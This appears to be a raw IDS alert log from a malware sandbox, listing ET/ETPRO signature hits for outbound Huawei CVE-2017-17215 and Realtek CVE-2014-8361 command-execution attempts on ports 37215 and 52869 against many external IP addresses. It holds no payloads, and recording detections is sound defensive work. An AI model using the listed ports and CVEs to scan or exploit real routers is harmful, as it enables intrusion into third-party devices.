                                      07/20/24-23:01:11.639230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663037215192.168.2.23157.17.142.189
                                      07/20/24-23:01:20.202325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056237215192.168.2.2341.245.53.9
                                      07/20/24-23:01:25.379759TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615114852869192.168.2.2338.122.84.31
                                      07/20/24-23:01:13.287248TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615822052869192.168.2.235.142.247.218
                                      07/20/24-23:01:42.566124TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24187652869192.168.2.23175.125.31.24
                                      07/20/24-23:01:44.350602TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23627652869192.168.2.234.9.166.109
                                      07/20/24-23:01:42.985320TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615273052869192.168.2.23171.174.164.32
                                      07/20/24-23:01:51.949637TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5539452869192.168.2.2348.119.173.106
                                      07/20/24-23:01:57.243014TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26056052869192.168.2.2368.37.23.19
                                      07/20/24-23:01:31.328066TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5634852869192.168.2.2397.247.179.245
                                      07/20/24-23:01:32.034562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3301637215192.168.2.2341.52.129.29
                                      07/20/24-23:01:20.132510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797637215192.168.2.23197.27.213.242
                                      07/20/24-23:01:46.439689TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25551652869192.168.2.2399.181.48.189
                                      07/20/24-23:01:04.051104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858837215192.168.2.23197.18.10.40
                                      07/20/24-23:01:24.915904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564037215192.168.2.23197.169.84.58
                                      07/20/24-23:01:41.266946TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614930852869192.168.2.23130.96.13.171
                                      07/20/24-23:01:00.645051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543837215192.168.2.23197.233.33.61
                                      07/20/24-23:01:21.943544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403237215192.168.2.23197.246.88.6
                                      07/20/24-23:01:08.584507TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24167652869192.168.2.2397.69.175.230
                                      07/20/24-23:01:44.318262TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5702052869192.168.2.23187.157.152.232
                                      07/20/24-23:01:57.099838TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4182052869192.168.2.232.18.140.250
                                      07/20/24-23:01:48.986585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4971452869192.168.2.2332.103.164.103
                                      07/20/24-23:01:40.290003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205437215192.168.2.2341.21.106.63
                                      07/20/24-23:01:47.537829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25490052869192.168.2.23129.164.36.164
                                      07/20/24-23:01:41.419124TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613578852869192.168.2.23196.248.47.177
                                      07/20/24-23:01:54.922661TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24673852869192.168.2.23166.80.198.171
                                      07/20/24-23:02:28.464626TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25210052869192.168.2.2336.136.49.118
                                      07/20/24-23:01:56.900987TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614618052869192.168.2.2367.148.56.97
                                      07/20/24-23:01:20.150638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376437215192.168.2.2347.210.130.207
                                      07/20/24-23:01:34.048825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992037215192.168.2.23203.33.109.223
                                      07/20/24-23:01:43.190671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5499852869192.168.2.23120.189.67.125
                                      07/20/24-23:01:44.355606TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614654652869192.168.2.23156.133.161.252
                                      07/20/24-23:01:02.079114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548437215192.168.2.23106.214.178.206
                                      07/20/24-23:01:47.692209TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24068852869192.168.2.235.36.69.33
                                      07/20/24-23:01:58.423882TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23753252869192.168.2.2319.191.190.54
                                      07/20/24-23:01:21.954501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4902437215192.168.2.23199.131.169.33
                                      07/20/24-23:01:00.636533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290437215192.168.2.2341.190.181.48
                                      07/20/24-23:01:43.028316TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613481852869192.168.2.2357.248.72.169
                                      07/20/24-23:00:59.192052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304437215192.168.2.23157.8.46.59
                                      07/20/24-23:01:04.961552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4284252869192.168.2.23180.155.132.167
                                      07/20/24-23:01:52.244347TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3419852869192.168.2.2372.2.201.225
                                      07/20/24-23:01:40.311124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5095237215192.168.2.23197.136.132.148
                                      07/20/24-23:01:42.365783TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23649652869192.168.2.2384.227.123.147
                                      07/20/24-23:01:06.990535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266637215192.168.2.23158.38.51.47
                                      07/20/24-23:01:44.373922TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25225852869192.168.2.23163.173.48.45
                                      07/20/24-23:01:44.890268TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4856852869192.168.2.2318.141.77.94
                                      07/20/24-23:01:45.094539TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3858852869192.168.2.2312.154.226.190
                                      07/20/24-23:01:48.520303TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613385652869192.168.2.2368.106.199.227
                                      07/20/24-23:01:41.380560TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613434252869192.168.2.2370.124.249.51
                                      07/20/24-23:01:20.149798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294837215192.168.2.2341.79.99.46
                                      07/20/24-23:01:52.425638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3628252869192.168.2.2380.133.252.53
                                      07/20/24-23:00:59.185032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197037215192.168.2.23197.113.51.118
                                      07/20/24-23:01:14.113390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946637215192.168.2.2341.135.77.144
                                      07/20/24-23:01:20.596563TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3363452869192.168.2.2352.164.165.154
                                      07/20/24-23:01:43.977046TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5096852869192.168.2.23141.217.152.223
                                      07/20/24-23:00:59.148145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3624037215192.168.2.23157.231.240.156
                                      07/20/24-23:01:55.820768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4560052869192.168.2.23148.113.15.213
                                      07/20/24-23:01:44.274940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5834052869192.168.2.2376.231.40.42
                                      07/20/24-23:01:31.322217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4059052869192.168.2.23117.200.16.247
                                      07/20/24-23:01:45.965905TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615645652869192.168.2.23174.141.27.208
                                      07/20/24-23:01:11.820979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258037215192.168.2.2341.141.154.207
                                      07/20/24-23:01:46.220244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4051852869192.168.2.23104.155.48.50
                                      07/20/24-23:02:12.267183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4203652869192.168.2.2387.152.13.65
                                      07/20/24-23:01:44.825081TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23918252869192.168.2.2343.113.255.232
                                      07/20/24-23:01:00.634165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728437215192.168.2.23197.35.57.182
                                      07/20/24-23:01:08.590754TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3859252869192.168.2.2363.80.178.96
                                      07/20/24-23:01:07.036064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3834437215192.168.2.23116.171.63.113
                                      07/20/24-23:01:04.113037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701437215192.168.2.23169.56.210.25
                                      07/20/24-23:01:42.854321TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24454452869192.168.2.2349.37.83.56
                                      07/20/24-23:01:00.635367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939237215192.168.2.23155.165.181.96
                                      07/20/24-23:01:43.540053TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615535852869192.168.2.23185.117.12.122
                                      07/20/24-23:01:45.175511TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23608852869192.168.2.23217.231.155.95
                                      07/20/24-23:01:55.964600TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3462652869192.168.2.2352.24.218.23
                                      07/20/24-23:01:12.841280TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26067852869192.168.2.2342.191.217.231
                                      07/20/24-23:01:44.559917TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3773452869192.168.2.2335.56.95.76
                                      07/20/24-23:01:44.663524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5623252869192.168.2.23201.86.102.204
                                      07/20/24-23:01:45.697846TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5818452869192.168.2.23223.33.49.156
                                      07/20/24-23:01:43.478924TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24355452869192.168.2.23113.10.123.41
                                      07/20/24-23:01:53.407777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25160252869192.168.2.23111.91.178.70
                                      07/20/24-23:01:45.164161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614542652869192.168.2.2360.240.72.8
                                      07/20/24-23:01:57.695259TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25323452869192.168.2.23105.70.135.245
                                      07/20/24-23:01:04.085431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623837215192.168.2.2341.206.146.166
                                      07/20/24-23:01:46.629198TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5636252869192.168.2.2399.98.54.155
                                      07/20/24-23:01:00.645051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286837215192.168.2.23113.30.251.105
                                      07/20/24-23:01:24.752424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5241452869192.168.2.2334.158.218.166
                                      07/20/24-23:01:44.996260TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25599452869192.168.2.23219.230.144.186
                                      07/20/24-23:01:24.867858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5449037215192.168.2.2341.99.111.146
                                      07/20/24-23:01:46.054776TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26091652869192.168.2.23137.109.251.204
                                      07/20/24-23:01:04.113037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494237215192.168.2.2341.197.205.28
                                      07/20/24-23:02:02.415002TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5123052869192.168.2.23216.165.192.32
                                      07/20/24-23:01:11.631728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237437215192.168.2.23106.4.213.108
                                      07/20/24-23:01:46.032975TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23528852869192.168.2.23166.191.111.147
                                      07/20/24-23:01:00.654988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3505837215192.168.2.23105.15.118.157
                                      07/20/24-23:01:42.006483TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4176652869192.168.2.2396.234.113.72
                                      07/20/24-23:01:58.729502TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4990852869192.168.2.23111.91.178.70
                                      07/20/24-23:01:48.918065TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3797052869192.168.2.23138.132.84.64
                                      07/20/24-23:01:00.634089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5695637215192.168.2.2389.73.227.199
                                      07/20/24-23:01:45.194629TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23326452869192.168.2.23141.54.172.151
                                      07/20/24-23:01:48.765940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4211852869192.168.2.23174.126.153.78
                                      07/20/24-23:01:54.672544TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23785452869192.168.2.23142.143.249.204
                                      07/20/24-23:01:43.921490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4777652869192.168.2.23153.197.120.12
                                      07/20/24-23:01:47.523523TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613325052869192.168.2.2350.12.228.50
                                      07/20/24-23:01:46.512162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4577252869192.168.2.23179.32.230.224
                                      07/20/24-23:00:57.221026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4613637215192.168.2.23197.12.204.52
                                      07/20/24-23:01:54.702517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4214852869192.168.2.23222.125.116.173
                                      07/20/24-23:01:56.091033TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615571052869192.168.2.2364.55.184.24
                                      07/20/24-23:00:57.222164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748037215192.168.2.2378.242.93.228
                                      07/20/24-23:01:04.233857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937637215192.168.2.2341.70.142.225
                                      07/20/24-23:01:42.960666TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615669052869192.168.2.2334.53.132.35
                                      07/20/24-23:00:59.178062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459637215192.168.2.2341.119.22.219
                                      07/20/24-23:01:31.312895TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5167652869192.168.2.23123.249.201.235
                                      07/20/24-23:01:41.604763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3895652869192.168.2.23114.149.101.121
                                      07/20/24-23:01:44.215876TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615290652869192.168.2.23213.139.230.45
                                      07/20/24-23:01:43.175740TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5395452869192.168.2.23162.142.171.159
                                      07/20/24-23:01:13.152454TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5935652869192.168.2.2352.234.117.101
                                      07/20/24-23:00:57.222254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274037215192.168.2.23149.227.100.108
                                      07/20/24-23:00:59.204975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084237215192.168.2.2341.241.135.76
                                      07/20/24-23:01:04.118165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415637215192.168.2.23146.66.7.8
                                      07/20/24-23:01:44.922746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5559452869192.168.2.23216.41.229.158
                                      07/20/24-23:01:46.844704TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3740652869192.168.2.23161.217.163.253
                                      07/20/24-23:01:51.943792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614189452869192.168.2.23210.84.36.218
                                      07/20/24-23:01:46.308516TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615494252869192.168.2.2392.64.232.40
                                      07/20/24-23:01:41.266946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5180452869192.168.2.23193.38.103.224
                                      07/20/24-23:01:54.787983TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24155652869192.168.2.232.74.163.138
                                      07/20/24-23:01:11.632393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3750837215192.168.2.23197.118.42.51
                                      07/20/24-23:01:46.068251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24944652869192.168.2.2377.112.72.60
                                      07/20/24-23:01:08.630327TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24639252869192.168.2.2338.158.187.83
                                      07/20/24-23:01:59.704241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5474852869192.168.2.2395.71.29.54
                                      07/20/24-23:01:32.046185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100437215192.168.2.23151.83.52.203
                                      07/20/24-23:01:34.044223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671437215192.168.2.2341.139.79.186
                                      07/20/24-23:01:47.614619TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25083452869192.168.2.2341.199.13.54
                                      07/20/24-23:01:49.055673TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25898452869192.168.2.23170.132.161.86
                                      07/20/24-23:01:47.552279TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25173252869192.168.2.2348.81.156.141
                                      07/20/24-23:01:47.410892TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25437252869192.168.2.2313.59.59.107
                                      07/20/24-23:02:06.131728TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5988252869192.168.2.2361.92.48.14
                                      07/20/24-23:01:02.702506TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4953052869192.168.2.23132.86.136.162
                                      07/20/24-23:01:40.290003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835437215192.168.2.23157.4.24.226
                                      07/20/24-23:00:57.221132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918837215192.168.2.23197.166.141.245
                                      07/20/24-23:01:00.636533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802437215192.168.2.23163.95.87.60
                                      07/20/24-23:01:43.282556TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613570652869192.168.2.2389.86.226.219
                                      07/20/24-23:01:03.407760TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615364052869192.168.2.2391.10.179.128
                                      07/20/24-23:01:44.104536TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3496252869192.168.2.2395.85.24.175
                                      07/20/24-23:01:43.515688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3839852869192.168.2.23137.133.156.16
                                      07/20/24-23:01:43.164529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5639452869192.168.2.23118.209.219.113
                                      07/20/24-23:01:49.278428TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613742852869192.168.2.2318.233.238.80
                                      07/20/24-23:00:59.213564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3639237215192.168.2.23157.153.207.206
                                      07/20/24-23:02:10.069241TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615865252869192.168.2.239.104.144.169
                                      07/20/24-23:01:11.631134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3319837215192.168.2.23197.22.37.33
                                      07/20/24-23:01:47.912435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5982652869192.168.2.2394.86.220.196
                                      07/20/24-23:01:02.745352TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615011852869192.168.2.2374.116.148.181
                                      07/20/24-23:01:41.580548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5221052869192.168.2.2394.159.177.21
                                      07/20/24-23:01:42.971099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3869652869192.168.2.23180.231.223.193
                                      07/20/24-23:01:47.610546TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614728852869192.168.2.2396.112.20.112
                                      07/20/24-23:01:00.641498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793037215192.168.2.23157.129.226.209
                                      07/20/24-23:01:41.974742TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4783652869192.168.2.23155.110.172.241
                                      07/20/24-23:01:31.329969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5215052869192.168.2.2360.163.17.129
                                      07/20/24-23:01:00.634497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568037215192.168.2.23197.17.32.247
                                      07/20/24-23:01:41.304640TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616019252869192.168.2.2340.23.131.130
                                      07/20/24-23:01:45.511523TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4190852869192.168.2.23169.97.165.219
                                      07/20/24-23:01:34.048825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3929437215192.168.2.23157.188.52.205
                                      07/20/24-23:01:57.489843TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5892452869192.168.2.23207.166.244.138
                                      07/20/24-23:01:58.291705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4330252869192.168.2.23116.106.3.51
                                      07/20/24-23:01:07.054782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4673037215192.168.2.23197.187.87.186
                                      07/20/24-23:01:59.353096TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23730452869192.168.2.23124.255.77.181
                                      07/20/24-23:02:08.008782TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3675852869192.168.2.23168.26.102.58
                                      07/20/24-23:03:46.099099TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615308852869192.168.2.23112.255.225.88
                                      07/20/24-23:01:42.966087TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4963452869192.168.2.2331.247.155.57
                                      07/20/24-23:00:57.220866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511237215192.168.2.23157.87.181.134
                                      07/20/24-23:01:41.156801TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616057052869192.168.2.2320.143.101.231
                                      07/20/24-23:01:53.309955TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24165052869192.168.2.23195.166.157.114
                                      07/20/24-23:01:02.055683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870037215192.168.2.23157.224.12.67
                                      07/20/24-23:01:42.602712TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24389452869192.168.2.23126.224.156.29
                                      07/20/24-23:01:24.612014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4695052869192.168.2.2377.157.20.139
                                      07/20/24-23:01:24.867858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275837215192.168.2.23112.90.251.196
                                      07/20/24-23:01:47.954400TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25353452869192.168.2.23131.254.60.151
                                      07/20/24-23:01:46.176757TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25390252869192.168.2.23202.109.173.165
                                      07/20/24-23:01:06.975117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495837215192.168.2.23152.142.62.185
                                      07/20/24-23:01:41.286382TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614551852869192.168.2.23145.71.96.96
                                      07/20/24-23:01:44.005947TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5601452869192.168.2.23119.211.191.173
